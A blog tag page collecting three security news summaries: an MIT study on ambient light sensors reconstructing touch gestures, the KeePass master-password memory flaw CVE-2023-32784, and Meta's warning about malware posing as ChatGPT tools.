Tag: Hacker

  • Phone Light Sensor: A Potential Tool for Unauthorized Surveillance

    Phone Light Sensor: A Potential Tool for Unauthorized Surveillance

    Credit: Unsplash.

    In increasingly mobile-dependent lives, people entrust their smartphones with various sensitive tasks, from financial transactions to work-related activities and even documenting personal musings through apps like Notes. However, a recent study conducted by MIT researchers sheds light on a potential privacy threat associated with the unassuming ambient light sensor in most phones.

    The Vulnerability of Ambient Light Sensors

    While smartphones often require user permissions for apps to access features like the camera or microphone, ambient light sensors typically operate without such constraints. According to the MIT team led by Yang Liu, hackers could exploit this vulnerability to track and reconstruct a user’s activities.

    The researchers developed an algorithm capable of utilizing variations captured by the light sensor to reconstruct images of a person’s touch interactions with their phone, such as scrolling or swiping. Testing the algorithm on an off-the-shelf Android tablet in various scenarios, including interactions with a dummy and gestures during video playback, revealed that light sensor data could recreate screen interactions.

    Privacy Threat and Current Limitations

    Despite the potential privacy threat, the study assures that the risk is not imminent. The rate at which images could be retrieved was relatively slow, at one frame every 3.3 minutes. This limitation would make it challenging for any potential threat to keep up with real-time phone interactions. Additionally, images retrieved from a natural video source were found to be relatively blurry.

    Mitigating Potential Risks

    To address potential risks, the researchers propose several recommendations. They emphasize the need to restrict access to ambient light sensors, requiring user permission similar to camera or microphone requests. Furthermore, they suggest imposing limitations on the sensor’s precision and speed to prevent the creation of high-resolution images. Placing the sensor on the side of the device where it cannot capture revealing gestures is also suggested as a protective measure.

    In conclusion, while the threat of exploiting ambient light sensors to invade privacy has been demonstrated, implementing suggested software restrictions and precautions can help mitigate the risks associated with this emerging vulnerability.


    Read the original article on Science Advances.

  • KeePass Exploit Enables Attackers to Recuperate Master Passwords from Memory

    KeePass Exploit Enables Attackers to Recuperate Master Passwords from Memory

    A proof-of-concept (PoC) has been provided for a security flaw affecting the KeePass password manager that could be exploited to recover a victim’s master password in cleartext under certain situations.

    The problem, tracked as CVE-2023-32784, impacts KeePass versions 2.x for Windows, Linux, and macOS and is presumed to be patched in version 2.54, which is likely to be launched very early next month.

    According to a security researcher, “vdhoney,” apart from the first password character, it is mainly possible to recuperate the password in plaintext. No code execution on the target system is required, just a memory dump.

    vdhoney adds that, regardless of the memory’s origin or if the workspace is secured, it is possible to dump the password from RAM after KeePass is no longer running. However, the possibility of that functioning goes down with time it has been ever since.

    Bypassing KeePass

    Successful exploitation of the problem relies on the condition that an attacker has jeopardized a potential target’s computer. It also requires that the password is typed on a keyboard and not copied from a clipboard.

    vdhoney said the vulnerability concerns how a custom text box field used for entering the master password manages user input. Specifically, it has been found to leave traces of every character the user enters the program memory.

    This results in a scenario wherein an attacker can dispose of the program’s memory and reconstruct the password in plaintext with the exception of the first character. Users are advised to update to KeePass 2.54 once it becomes available.

    The disclosure comes a few months after a different medium-severity flaw (CVE-2023-24055) was revealed in the open-source password manager that could be exploited to get cleartext passwords from the password database by taking advantage of write access to the software’s XML file.

    KeePass has insisted that the password database is not meant to be secure against an attacker with that level of local computer access.

    It also follows discoveries from Google security research that outlined a flaw in password managers such as Bitwarden, Dashlane, and Safari, which can be abused to auto-fill saved credentials into untrusted web pages, causing possible account takeovers.


    Originally published on The Hacker News.

    Read more: ChatGPT and The Dark Web, Yet, A Hushed Talk in The Tech World.

  • Hackers Install Malware Instead of Promised AI

    Hackers Install Malware Instead of Promised AI

    Tech titan Meta says it expects hackers and other malicous actors online to begin using generative artificial intelligence to scale up attacks. Credit: W&V.

    On Wednesday, the social media giant Meta, which is the parent company of popular platforms such as Facebook, Instagram, and WhatsApp, warned that hackers exploit the popularity and potential of generative artificial intelligence tools like ChatGPT to lure people into installing malware on their devices. Guy Rosen, Meta’s chief information security officer, revealed that the company’s security analysts recently detected a wave of malicious software posing as ChatGPT or similar AI tools.

    Analysis on AI by Rosen

    Rosen noted that generative AI technology has been capturing people’s imagination and everyone’s excitement, and it has not gone unnoticed by cybercriminals. The company has seen “threat actors” promoting internet browser extensions that offer generative AI capabilities but contain malicious code designed to infect users’ devices.

    Rosen cautioned that hackers frequently use enticing advancements as bait to deceive people into clicking on malicious links or downloading software that steals personal data, a tactic that has also been employed in crypto scams due to the high demand for digital currency.

    Meta’s security team has identified and blocked over a thousand web addresses that claim to offer ChatGPT-like tools but are traps set by hackers. Although Meta has not yet seen generative AI used as more than bait by hackers, Rosen warned that the inevitability of it being used as a weapon is coming, and the company is preparing for it.

    “Generative AI holds great promise and bad actors know it, so we should all be vigilant to stay safe,” Rosen said.

    Meta’s security approach on AI

    Meta is taking a proactive approach to online security by exploring the use of generative AI as a defense against hackers and online influence campaigns. Nathaniel Gleicher, the head of security policy at Meta, shared that they have teams dedicated to anticipating potential AI abuse and developing defenses to counter them. By leveraging AI as both a weapon and a shield, Meta aims to stay ahead of evolving cyber threats.

    Generative AI is a form of machine learning that uses algorithms to create original content, such as images, videos, and text, by learning from a large amount of data. This technology has numerous potential applications, from creating virtual assistants and chatbots to generating realistic images and videos that could be used in various fields like entertainment, advertising, and medicine. However, as with any new and exciting technology, it has also attracted the attention of hackers looking to exploit its potential for malicious purposes.

    One possible scenario is that hackers could use generative AI to create convincing phishing emails that appear to be from legitimate sources, making it difficult for people to spot them as fake. They could also use generative AI to create deep fake videos or audio recordings that could be used to spread disinformation and manipulate public opinion.

    Ways explored by Meta to combat threats

    To counter such threats, Meta is exploring ways to use generative AI to detect and counteract fake content and attacks. One approach is to develop algorithms that can identify and flag questionable content generated by AI. Meta could also use generative AI to create more realistic and convincing simulated attacks that could help train security teams to recognize and respond to real threats.

    Overall, Meta’s warning about the potential misuse of generative AI is a reminder that as exciting as new technologies can be, they can also be exploited for nefarious purposes. Individuals and companies need to be aware of these risks and take steps to protect themselves. In this case, it means being cautious when installing new software or browser extensions and watching for any suspicious behavior or activity.


    Read the original article on Tech Explore.

    Read more: The Green Hydrogen Time, as a Renewable Energy Sources.